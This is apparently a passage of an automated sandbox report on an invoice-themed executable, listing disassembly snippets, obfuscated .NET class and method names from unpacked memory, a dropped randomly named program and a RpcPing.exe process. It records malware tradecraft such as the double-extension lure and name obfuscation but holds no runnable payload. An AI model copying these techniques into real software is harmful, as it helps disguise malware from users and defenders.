Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00413F1C push eax; ret	3_2_00413F26
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_00417FD0 push esp; ret	3_2_00417FD1
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_004187E8 push ebx; ret	3_2_004187E9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_019E225F pushad ; ret	3_2_019E27F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_019E27FA pushad ; ret	3_2_019E27F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A109AD push ecx; mov dword ptr [esp], ecx	3_2_01A109B6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_019E283D push eax; iretd	3_2_019E2858
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_019E1368 push eax; iretd	3_2_019E1369
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036FEB7E push ebx; ret	7_2_036FEBA5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036FEB7B push ebx; ret	7_2_036FEBA5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036F1242 push ds; iretd	7_2_036F1244
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036F6005 push edi; ret	7_2_036F6007
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_036FF0A1 pushfd ; iretd	7_2_036FF120
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_037008BF push esp; iretd	7_2_037008C5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_03701723 push ebx; ret	7_2_03701724
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_03700F0B push esp; ret	7_2_03700F0C
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe	Code function: 7_2_03701C14 push cs; retf	7_2_03701C15
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_039E225F pushad ; ret	8_2_039E27F9
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_039E27FA pushad ; ret	8_2_039E27F9

Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, VJYMC1jXYO50ycofa1x.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mWGkFufV9U', 'ApFkVrOJRd', 'db9kIA8C0y', 'MfskyfFbUh', 'SwNkMWF7Hm', 'W9mkSjc1P3', 'w8fk69wyFB'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, EAgkxljcSmXysaymPIk.cs	High entropy of concatenated method names: 'RoP1fAGoKF', 'v1Z1Jj8y5P', 'naX17cYyaC', 'gFN1m8tX4n', 'yV810gqwt1', 'uQl1bVYa5b', 'Yu41LCWHqT', 'l8v1e51Yig', 'QVR1hE6xBl', 'Prp1OKcjXc'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, aCwl6tvb2r4l4lgPk8.cs	High entropy of concatenated method names: 'qYc75uL0J', 'TEqmUh9JD', 'c5dbOQ7ig', 'U9iLEsk4w', 'hgQhE9arO', 'iJNOkodQA', 'ON9mMpa2SRwpjNA4RP', 's5oqLfELxjtjsN3BfX', 'mx6ZkEZ02', 'aILkOXd9S'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, ARbWimPM9BLNHCRJ2O.cs	High entropy of concatenated method names: 'e1O1jvdwZr', 'SXf1XQOB8p', 'jhe15adhQB', 'kEV1CUuZ21', 'jJ91dvBUX0', 'olx12W4w9G', 'f021HZ7X4x', 'F5oZ6eTVN7', 'X2YZDoBptq', 'EM5ZaRY0e2'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs	High entropy of concatenated method names: 'z7yXB89VK8', 'IiWXCoDZKI', 'qZoXd0h6ey', 'nZtXuCuZoa', 'R1nX2iXMaT', 'hEkXHvUAUj', 'IIAXUyEo5F', 'kwgXT3sjcd', 'uNUXqo1SeY', 'BdUXEUl1Ex'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, nTJjqGDEwt6UWiOkfg.cs	High entropy of concatenated method names: 'j2jZCrM7t3', 'oCDZdlkDXE', 'xIoZuThGYC', 'XbpZ2m7DtY', 'JWXZHgcd5P', 'dOaZUUL8u6', 'GBGZTEy2O1', 'e4vZqlWchb', 'xYOZE1jTMo', 'FqfZY2WSBk'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, J1Np7SeHlsncQgvjqU.cs	High entropy of concatenated method names: 'BGodFXXeEs', 'meedVWaBO3', 'fdodIcvsJA', 'cZsdyma6VS', 'E5odM0O7tF', 'iBEdSs3Oyo', 'l5Cd6vJ0Um', 'BKcdDUyKTh', 'pVfdaGIfhu', 'UODdPwGKxy'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, OjZ7RBSXW86l78uSxp.cs	High entropy of concatenated method names: 'eTwWDh6bDh', 'kSuWPIuSIi', 'hAOZc6rv10', 'wAJZje16d5', 'HQtWo2MMOJ', 'xIiWpVyrDd', 'iumWiHakR3', 'z4NWFWuoKE', 'pf7WV0rBaY', 'l9uWI3daYE'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, Wpam4hihg0Nvl3e5yB.cs	High entropy of concatenated method names: 'rDw4eNbg84', 'Hy64hcY5T5', 'Jl94RYA28h', 'YUX4ABgB56', 'Bsr4sYtwxy', 'Fdx4tMaSeO', 'My54GTy3KO', 'AK04lvZJSZ', 'nxH4g3wdoB', 'BS04oSgrlk'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, Ai53E95PRabl3WDJEP.cs	High entropy of concatenated method names: 'vWtjU1Np7S', 'ilsjTncQgv', 'h3TjE9yKYE', 'VMIjYEf7nX', 'l7ejxWZsCV', 'PIsjnZpK8D', 'ivRpbcbuWyOrt4TytB', 'KmPeqcOB4uJpsli6uS', 'sVyjjwK0Jt', 'UHojXdb3Sc'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, T2PoPgILNR5h8eN7LX.cs	High entropy of concatenated method names: 'ToString', 'OoknoUEQMu', 'MZHnAE9lj1', 'C5in8cMduG', 'LbEns56hT0', 'JdAntnKQ4S', 'LU2n9nuy6m', 'rsHnGr7iaW', 'WZ0nlwB6sf', 'hbQnwYCGO3'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, zy1dsfGrxZ2s5C8xWF.cs	High entropy of concatenated method names: 'gxOUCAI7sZ', 'DyRUuhdGwo', 'befUHcC4PC', 'AD3HP4kOLk', 'mwZHz4gR0v', 'YtNUcgkR5F', 'ufTUjcCBoJ', 'hr0Uvt0Qwf', 'GORUXjfQ2d', 'FBBU5xb4GX'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, ICVpIsRZpK8Dw3FWN4.cs	High entropy of concatenated method names: 'WPUHBSTr2l', 'jppHdW89r1', 'HsYH2iVEfM', 't2hHUQOGoK', 'yHnHTmbteU', 'TGK2MrTkaH', 'jRa2SFsWXd', 'LpP26eL8rg', 'giq2DnYRgL', 'B7x2aT0OKQ'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, ABEQf2h3T9yKYESMIE.cs	High entropy of concatenated method names: 'ADJumFnKbC', 's18ub2UmJU', 'E6MuePaFfc', 'PcPuh7Ng8n', 'LuauxcA9cg', 'tH5unYdUG7', 'caUuWums2f', 'uv2uZypJUX', 'tpxu1YvAF4', 'FTaukqX5GN'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, gKOXD3z7pcJxVh7SOu.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i2114BvDPO', 'cec1xs2Swy', 'wT11nbxefg', 'kI11We0uwH', 'OIg1Zvpw46', 'HPg11MwkW1', 'BB71kRKXPx'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, SWaEDGw2CVMfXXDHb5.cs	High entropy of concatenated method names: 'MbeUfvpZGR', 'RwiUJGWKSf', 'TiqU7bUbuW', 'OVhUma24DZ', 'uEsU09qlDZ', 'n5AUbQ59Rb', 'doeUL9Q4YA', 'l3PUeeq29b', 'NatUh2e7cf', 'fn0UO1JbKs'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, j81Na2FAQgp64f4UWH.cs	High entropy of concatenated method names: 'aWDxgQSBoT', 'YEYxpx3UtA', 'qsQxFkJW1A', 'TqtxVO36NV', 'JxSxAootTM', 'lZYx8I0EG7', 'zkVxsHnNGt', 'nRjxtZ4jxn', 'ua5x9grgMq', 'yAnxGwM1nb'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, jFxTeRd4Bb2okMqd4B.cs	High entropy of concatenated method names: 'Dispose', 'yYajaKLhYo', 'Ra2vAlwcKU', 'WtZHHveEDv', 'fYTjPJjqGE', 'Mt6jzUWiOk', 'ProcessDialogKey', 'xgQvcrLVXp', 'q5Evjj5S2a', 'ujHvv0RbWi'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, x7nXI7OSkcCo7q7eWZ.cs	High entropy of concatenated method names: 'ikL206PfVt', 'UQl2LsR7mt', 'Q3cu8rdnoH', 'dPnus7DV72', 'wZfutTTMik', 'Pg4u9ZqhLO', 'dZXuG0KeMK', 'TWSulb0d4m', 'wyWuwSMM0J', 'mr7ugsxl7Y'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, VJYMC1jXYO50ycofa1x.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mWGkFufV9U', 'ApFkVrOJRd', 'db9kIA8C0y', 'MfskyfFbUh', 'SwNkMWF7Hm', 'W9mkSjc1P3', 'w8fk69wyFB'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, EAgkxljcSmXysaymPIk.cs	High entropy of concatenated method names: 'RoP1fAGoKF', 'v1Z1Jj8y5P', 'naX17cYyaC', 'gFN1m8tX4n', 'yV810gqwt1', 'uQl1bVYa5b', 'Yu41LCWHqT', 'l8v1e51Yig', 'QVR1hE6xBl', 'Prp1OKcjXc'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, aCwl6tvb2r4l4lgPk8.cs	High entropy of concatenated method names: 'qYc75uL0J', 'TEqmUh9JD', 'c5dbOQ7ig', 'U9iLEsk4w', 'hgQhE9arO', 'iJNOkodQA', 'ON9mMpa2SRwpjNA4RP', 's5oqLfELxjtjsN3BfX', 'mx6ZkEZ02', 'aILkOXd9S'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, ARbWimPM9BLNHCRJ2O.cs	High entropy of concatenated method names: 'e1O1jvdwZr', 'SXf1XQOB8p', 'jhe15adhQB', 'kEV1CUuZ21', 'jJ91dvBUX0', 'olx12W4w9G', 'f021HZ7X4x', 'F5oZ6eTVN7', 'X2YZDoBptq', 'EM5ZaRY0e2'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs	High entropy of concatenated method names: 'z7yXB89VK8', 'IiWXCoDZKI', 'qZoXd0h6ey', 'nZtXuCuZoa', 'R1nX2iXMaT', 'hEkXHvUAUj', 'IIAXUyEo5F', 'kwgXT3sjcd', 'uNUXqo1SeY', 'BdUXEUl1Ex'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, nTJjqGDEwt6UWiOkfg.cs	High entropy of concatenated method names: 'j2jZCrM7t3', 'oCDZdlkDXE', 'xIoZuThGYC', 'XbpZ2m7DtY', 'JWXZHgcd5P', 'dOaZUUL8u6', 'GBGZTEy2O1', 'e4vZqlWchb', 'xYOZE1jTMo', 'FqfZY2WSBk'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, J1Np7SeHlsncQgvjqU.cs	High entropy of concatenated method names: 'BGodFXXeEs', 'meedVWaBO3', 'fdodIcvsJA', 'cZsdyma6VS', 'E5odM0O7tF', 'iBEdSs3Oyo', 'l5Cd6vJ0Um', 'BKcdDUyKTh', 'pVfdaGIfhu', 'UODdPwGKxy'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, OjZ7RBSXW86l78uSxp.cs	High entropy of concatenated method names: 'eTwWDh6bDh', 'kSuWPIuSIi', 'hAOZc6rv10', 'wAJZje16d5', 'HQtWo2MMOJ', 'xIiWpVyrDd', 'iumWiHakR3', 'z4NWFWuoKE', 'pf7WV0rBaY', 'l9uWI3daYE'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, Wpam4hihg0Nvl3e5yB.cs	High entropy of concatenated method names: 'rDw4eNbg84', 'Hy64hcY5T5', 'Jl94RYA28h', 'YUX4ABgB56', 'Bsr4sYtwxy', 'Fdx4tMaSeO', 'My54GTy3KO', 'AK04lvZJSZ', 'nxH4g3wdoB', 'BS04oSgrlk'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, Ai53E95PRabl3WDJEP.cs	High entropy of concatenated method names: 'vWtjU1Np7S', 'ilsjTncQgv', 'h3TjE9yKYE', 'VMIjYEf7nX', 'l7ejxWZsCV', 'PIsjnZpK8D', 'ivRpbcbuWyOrt4TytB', 'KmPeqcOB4uJpsli6uS', 'sVyjjwK0Jt', 'UHojXdb3Sc'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, T2PoPgILNR5h8eN7LX.cs	High entropy of concatenated method names: 'ToString', 'OoknoUEQMu', 'MZHnAE9lj1', 'C5in8cMduG', 'LbEns56hT0', 'JdAntnKQ4S', 'LU2n9nuy6m', 'rsHnGr7iaW', 'WZ0nlwB6sf', 'hbQnwYCGO3'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, zy1dsfGrxZ2s5C8xWF.cs	High entropy of concatenated method names: 'gxOUCAI7sZ', 'DyRUuhdGwo', 'befUHcC4PC', 'AD3HP4kOLk', 'mwZHz4gR0v', 'YtNUcgkR5F', 'ufTUjcCBoJ', 'hr0Uvt0Qwf', 'GORUXjfQ2d', 'FBBU5xb4GX'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, ICVpIsRZpK8Dw3FWN4.cs	High entropy of concatenated method names: 'WPUHBSTr2l', 'jppHdW89r1', 'HsYH2iVEfM', 't2hHUQOGoK', 'yHnHTmbteU', 'TGK2MrTkaH', 'jRa2SFsWXd', 'LpP26eL8rg', 'giq2DnYRgL', 'B7x2aT0OKQ'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, ABEQf2h3T9yKYESMIE.cs	High entropy of concatenated method names: 'ADJumFnKbC', 's18ub2UmJU', 'E6MuePaFfc', 'PcPuh7Ng8n', 'LuauxcA9cg', 'tH5unYdUG7', 'caUuWums2f', 'uv2uZypJUX', 'tpxu1YvAF4', 'FTaukqX5GN'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, gKOXD3z7pcJxVh7SOu.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i2114BvDPO', 'cec1xs2Swy', 'wT11nbxefg', 'kI11We0uwH', 'OIg1Zvpw46', 'HPg11MwkW1', 'BB71kRKXPx'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, SWaEDGw2CVMfXXDHb5.cs	High entropy of concatenated method names: 'MbeUfvpZGR', 'RwiUJGWKSf', 'TiqU7bUbuW', 'OVhUma24DZ', 'uEsU09qlDZ', 'n5AUbQ59Rb', 'doeUL9Q4YA', 'l3PUeeq29b', 'NatUh2e7cf', 'fn0UO1JbKs'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, j81Na2FAQgp64f4UWH.cs	High entropy of concatenated method names: 'aWDxgQSBoT', 'YEYxpx3UtA', 'qsQxFkJW1A', 'TqtxVO36NV', 'JxSxAootTM', 'lZYx8I0EG7', 'zkVxsHnNGt', 'nRjxtZ4jxn', 'ua5x9grgMq', 'yAnxGwM1nb'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, jFxTeRd4Bb2okMqd4B.cs	High entropy of concatenated method names: 'Dispose', 'yYajaKLhYo', 'Ra2vAlwcKU', 'WtZHHveEDv', 'fYTjPJjqGE', 'Mt6jzUWiOk', 'ProcessDialogKey', 'xgQvcrLVXp', 'q5Evjj5S2a', 'ujHvv0RbWi'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, x7nXI7OSkcCo7q7eWZ.cs	High entropy of concatenated method names: 'ikL206PfVt', 'UQl2LsR7mt', 'Q3cu8rdnoH', 'dPnus7DV72', 'wZfutTTMik', 'Pg4u9ZqhLO', 'dZXuG0KeMK', 'TWSulb0d4m', 'wyWuwSMM0J', 'mr7ugsxl7Y'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, VJYMC1jXYO50ycofa1x.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mWGkFufV9U', 'ApFkVrOJRd', 'db9kIA8C0y', 'MfskyfFbUh', 'SwNkMWF7Hm', 'W9mkSjc1P3', 'w8fk69wyFB'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, EAgkxljcSmXysaymPIk.cs	High entropy of concatenated method names: 'RoP1fAGoKF', 'v1Z1Jj8y5P', 'naX17cYyaC', 'gFN1m8tX4n', 'yV810gqwt1', 'uQl1bVYa5b', 'Yu41LCWHqT', 'l8v1e51Yig', 'QVR1hE6xBl', 'Prp1OKcjXc'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, aCwl6tvb2r4l4lgPk8.cs	High entropy of concatenated method names: 'qYc75uL0J', 'TEqmUh9JD', 'c5dbOQ7ig', 'U9iLEsk4w', 'hgQhE9arO', 'iJNOkodQA', 'ON9mMpa2SRwpjNA4RP', 's5oqLfELxjtjsN3BfX', 'mx6ZkEZ02', 'aILkOXd9S'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, ARbWimPM9BLNHCRJ2O.cs	High entropy of concatenated method names: 'e1O1jvdwZr', 'SXf1XQOB8p', 'jhe15adhQB', 'kEV1CUuZ21', 'jJ91dvBUX0', 'olx12W4w9G', 'f021HZ7X4x', 'F5oZ6eTVN7', 'X2YZDoBptq', 'EM5ZaRY0e2'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs	High entropy of concatenated method names: 'z7yXB89VK8', 'IiWXCoDZKI', 'qZoXd0h6ey', 'nZtXuCuZoa', 'R1nX2iXMaT', 'hEkXHvUAUj', 'IIAXUyEo5F', 'kwgXT3sjcd', 'uNUXqo1SeY', 'BdUXEUl1Ex'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, nTJjqGDEwt6UWiOkfg.cs	High entropy of concatenated method names: 'j2jZCrM7t3', 'oCDZdlkDXE', 'xIoZuThGYC', 'XbpZ2m7DtY', 'JWXZHgcd5P', 'dOaZUUL8u6', 'GBGZTEy2O1', 'e4vZqlWchb', 'xYOZE1jTMo', 'FqfZY2WSBk'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, J1Np7SeHlsncQgvjqU.cs	High entropy of concatenated method names: 'BGodFXXeEs', 'meedVWaBO3', 'fdodIcvsJA', 'cZsdyma6VS', 'E5odM0O7tF', 'iBEdSs3Oyo', 'l5Cd6vJ0Um', 'BKcdDUyKTh', 'pVfdaGIfhu', 'UODdPwGKxy'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, OjZ7RBSXW86l78uSxp.cs	High entropy of concatenated method names: 'eTwWDh6bDh', 'kSuWPIuSIi', 'hAOZc6rv10', 'wAJZje16d5', 'HQtWo2MMOJ', 'xIiWpVyrDd', 'iumWiHakR3', 'z4NWFWuoKE', 'pf7WV0rBaY', 'l9uWI3daYE'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, Wpam4hihg0Nvl3e5yB.cs	High entropy of concatenated method names: 'rDw4eNbg84', 'Hy64hcY5T5', 'Jl94RYA28h', 'YUX4ABgB56', 'Bsr4sYtwxy', 'Fdx4tMaSeO', 'My54GTy3KO', 'AK04lvZJSZ', 'nxH4g3wdoB', 'BS04oSgrlk'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, Ai53E95PRabl3WDJEP.cs	High entropy of concatenated method names: 'vWtjU1Np7S', 'ilsjTncQgv', 'h3TjE9yKYE', 'VMIjYEf7nX', 'l7ejxWZsCV', 'PIsjnZpK8D', 'ivRpbcbuWyOrt4TytB', 'KmPeqcOB4uJpsli6uS', 'sVyjjwK0Jt', 'UHojXdb3Sc'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, T2PoPgILNR5h8eN7LX.cs	High entropy of concatenated method names: 'ToString', 'OoknoUEQMu', 'MZHnAE9lj1', 'C5in8cMduG', 'LbEns56hT0', 'JdAntnKQ4S', 'LU2n9nuy6m', 'rsHnGr7iaW', 'WZ0nlwB6sf', 'hbQnwYCGO3'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, zy1dsfGrxZ2s5C8xWF.cs	High entropy of concatenated method names: 'gxOUCAI7sZ', 'DyRUuhdGwo', 'befUHcC4PC', 'AD3HP4kOLk', 'mwZHz4gR0v', 'YtNUcgkR5F', 'ufTUjcCBoJ', 'hr0Uvt0Qwf', 'GORUXjfQ2d', 'FBBU5xb4GX'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, ICVpIsRZpK8Dw3FWN4.cs	High entropy of concatenated method names: 'WPUHBSTr2l', 'jppHdW89r1', 'HsYH2iVEfM', 't2hHUQOGoK', 'yHnHTmbteU', 'TGK2MrTkaH', 'jRa2SFsWXd', 'LpP26eL8rg', 'giq2DnYRgL', 'B7x2aT0OKQ'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, ABEQf2h3T9yKYESMIE.cs	High entropy of concatenated method names: 'ADJumFnKbC', 's18ub2UmJU', 'E6MuePaFfc', 'PcPuh7Ng8n', 'LuauxcA9cg', 'tH5unYdUG7', 'caUuWums2f', 'uv2uZypJUX', 'tpxu1YvAF4', 'FTaukqX5GN'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, gKOXD3z7pcJxVh7SOu.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i2114BvDPO', 'cec1xs2Swy', 'wT11nbxefg', 'kI11We0uwH', 'OIg1Zvpw46', 'HPg11MwkW1', 'BB71kRKXPx'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, SWaEDGw2CVMfXXDHb5.cs	High entropy of concatenated method names: 'MbeUfvpZGR', 'RwiUJGWKSf', 'TiqU7bUbuW', 'OVhUma24DZ', 'uEsU09qlDZ', 'n5AUbQ59Rb', 'doeUL9Q4YA', 'l3PUeeq29b', 'NatUh2e7cf', 'fn0UO1JbKs'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, j81Na2FAQgp64f4UWH.cs	High entropy of concatenated method names: 'aWDxgQSBoT', 'YEYxpx3UtA', 'qsQxFkJW1A', 'TqtxVO36NV', 'JxSxAootTM', 'lZYx8I0EG7', 'zkVxsHnNGt', 'nRjxtZ4jxn', 'ua5x9grgMq', 'yAnxGwM1nb'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, jFxTeRd4Bb2okMqd4B.cs	High entropy of concatenated method names: 'Dispose', 'yYajaKLhYo', 'Ra2vAlwcKU', 'WtZHHveEDv', 'fYTjPJjqGE', 'Mt6jzUWiOk', 'ProcessDialogKey', 'xgQvcrLVXp', 'q5Evjj5S2a', 'ujHvv0RbWi'
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, x7nXI7OSkcCo7q7eWZ.cs	High entropy of concatenated method names: 'ikL206PfVt', 'UQl2LsR7mt', 'Q3cu8rdnoH', 'dPnus7DV72', 'wZfutTTMik', 'Pg4u9ZqhLO', 'dZXuG0KeMK', 'TWSulb0d4m', 'wyWuwSMM0J', 'mr7ugsxl7Y'

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
